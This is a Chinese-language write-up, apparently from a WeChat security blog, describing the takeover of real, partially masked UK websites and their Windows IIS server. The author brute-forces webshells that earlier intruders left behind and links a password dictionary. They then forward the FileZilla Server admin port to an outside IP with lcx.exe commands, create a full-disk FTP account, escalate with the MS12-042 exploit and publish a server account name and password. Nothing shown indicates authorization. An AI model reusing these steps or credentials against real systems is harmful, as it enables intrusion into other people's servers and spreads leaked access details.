|
|
0x01 前言
基本信息探测:
-
目标站点:http://www.wem****.co.uk
-
服务器IP:9*.1*9.1*4.*2(英国)
-
环境平台:ASP.NET
-
服务器系统:Microsoft-IIS/7.5
PORT STATE SERVICE VERSION21/tcp open ftp FileZilla ftpd 0.9.41 beta80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
0x02 Getshell过程
打开御剑把扫描到的链接导出来,用了半小时检测,虽然发现了一些上传、注入,Fckeditor啥的,但感觉这些漏洞好像都被别人修复过了,接着往下看,找到了几个敏感文件名,打开看既然是一个大马和一句话木马,通过弱口令和爆破方式成功得到密码。
弱口令测试:http://www.berkshire-*****-workshops.co.uk/test.aspx Pass:admin一句话爆破:http://www.sonnergy*shade.co.uk/css.asp Pass:110
爆破字典:https://github.com/3had0w/Fuzzing-Dicts
注:成功拿到这个目标网站的Webshell权限可以说运气成份很大,但也需要一定的细心、耐心和经验,这几点在做渗透测试时也是非常重要的。
0x03 实战提权过程
-
经过测试发现可直接跨到目标站,并且具备上传、新建和删除文件权限,但就是没有修改权限;
-
2008的提权EXP不多,尝试了各种已知提权EXP均以失败告终,可以再去试一下MSF的提权模块;
-
找第三方软件提权,前期的信息探测中已知系统运行着FileZilla ftpd 0.9.41 beta软件,找找看有没有安装的有FileZilla Server服务端;
注:可以用netstat -ano、tasklist命令来查看目标机器中是否安装的有可用于提权的第三方软件,如:Radmin、Gene6FTP、FileZilla Server等。
Filezilla Serve这个软件在国外服务器用的还是挺多的,21端口是客户端连接时需要的,14147端口则是服务端运行时需要的。我们的提权方法就是利用端口转发方式直接登录到目标机器的Filezilla Server服务端,然后创建一个拥有全盘目录权限的FTP账户。
(1) 使用netstat -ano、tasklist命令确认目标服务器是否运行了Filezilla Server软件,是不是用默认的14147端口,或者是修改为其它端口了,如下图。
用来保存管理员用户信息:C:Program FilesFileZilla ServerFileZillaServer Interface.xml用来保存普通FTP用户信息:C:Program FilesFileZilla ServerFileZilla Server.xml
lcx.exe -listen 51 14147,首先本机监听51端口,连接用14147端口。
lcx.exe -slave 外网IP 51 127.0.0.1 14147。
注:如果出现连接不上的情况,这可能是因为我们本地的Filezilla Server与目标的Filezilla Server版本不一致,为了避免这个问题,可以直接将服务器上的Filezilla Server整个文件夹打包下来运行。
这里目的已经达到,指定文件已经有了修改权限,所以就暂时没再继续提服务器了,FTP权限已经足够用了!隔了几天后用MS12-042提权EXP成功拿到服务器权限,帐号:luoye,密码:456$love。
0x04 思考总结
(2) 服务器外网,配置文件只读权限,通过端口转发工具将端口转发出来,如果服务器不在内网,随便一款端口转发都可以。
(3) 服务器内网,配置文件只读权限,利用lcx.exe将内网端口转发出来,与2的方法是一样的,只不过一个内网,一个外网。
-
外网服务器:用端口转发功能突破配置文件只读限制;
-
内网服务器:用端口转发功能突破内网连接及配置文件只读限制;
推 荐 阅 读
欢 迎 私 下 骚 扰
本文始发于微信公众号(潇湘信安):记一次后门爆破到提权实战案例
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论